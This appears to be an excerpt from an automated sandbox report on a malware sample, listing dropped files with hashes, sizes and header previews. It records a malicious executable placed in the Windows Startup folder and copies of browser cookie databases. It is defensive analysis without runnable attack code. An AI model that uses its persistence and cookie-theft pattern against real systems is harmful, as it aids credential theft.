Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF5N2RD4MXYYH24IZYQB.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BGG6QB04800GW19WWAG9.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BP3VJGZ843DBIXOOPKWO.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ECHANM7I2UV7O9MJVU2O.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GXTZ77HM57ANYV3AGI9D.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H7TWJ1QU43IH3T7R84BJ.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDIQDWV208VZAZ2IXKJQ.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NQYL3UCIDEY5U6ZYZGON.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W8D85FAX4AI098EV4R6D.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WEJERITQSQYJEDR17MBA.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YFOCYSUCRX7008H79EM5.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YLHEVBN28POIQY4HNZN8.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.586654072786741
Encrypted:	false
SSDEEP:	96:chQCsMqDqvsqvJCwo3z8hQCsMqDqvsEHyqvJCwortzbKKrGH8ZqR+lUVJIu:cyWo3z8yOHnortzbPNZqRnIu
MD5:	64CF28BEDB2453151DE8C2671FB95FE1
SHA1:	9C7C0459A6F866345C0ECFD410737A2E29FDC838
SHA-256:	791823726123A8DE032D51D786FF9099A247B4A933D089BDE7476195CF51EDC2
SHA-512:	342D92B3D777C70387294E063790C5348C61AD3299739F234E41C1791A2D1657552F2387D5A5ED011CEEE2F83019D6258729DE00E6EE09D7BBD5617D76926B74
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Download File
Process:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	2.545995908897728
Encrypted:	false
SSDEEP:	6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5:	D96F52FC8733D2F4A127BDC44D4CEB25
SHA1:	E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256:	FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512:	08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: lsqtIv1jRK.exe, Detection: malicious, Browse Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................".(.....^..}.....(.......(.....&.(......".......".(#....Vs....($...t.............0................s......o......0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

C:\Users\user\AppData\Roaming\kwokjzlt.hy4\Chrome\Default\Cookies Download File
Process:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.9650411582864293
Encrypted:	false
SSDEEP:	48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5:	903C35B27A5774A639A90D5332EEF8E0
SHA1:	5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256:	1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512:	076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kwokjzlt.hy4\Firefox\Profiles\7xwghk55.default\cookies.sqlite Download File
Process:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.08107860342777487
Encrypted:	false
SSDEEP:	48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5:	1138F6578C48F43C5597EE203AFF5B27
SHA1:	9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256:	EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
